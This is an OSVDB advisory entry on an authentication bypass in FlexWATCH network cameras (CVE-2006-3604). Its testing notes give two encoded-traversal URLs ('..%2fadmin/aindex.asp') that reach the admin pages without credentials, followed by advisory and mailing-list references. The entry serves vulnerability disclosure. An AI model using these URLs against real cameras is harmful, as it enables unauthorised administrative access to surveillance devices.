FlexWATCH Network Camera Encoded Traversal Admin Authentication Bypass

2006-07-10T08:49:14
ID OSVDB:27136
Type osvdb
Reporter OSVDB
Modified 2006-07-10T08:49:14

Description

Manual Testing Notes

http://[target]/..%2fadmin/aindex.asp http://[target]/app/..%2fadmin/aindex.htm

References:

Vendor URL: http://www.flexwatch.com/ Secunia Advisory ID:20994 Related OSVDB ID: 27135 Other Advisory URL: http://www.digitalarmaments.com/2006300687985463.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0046.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0123.html CVE-2006-3604 Bugtraq ID: 18948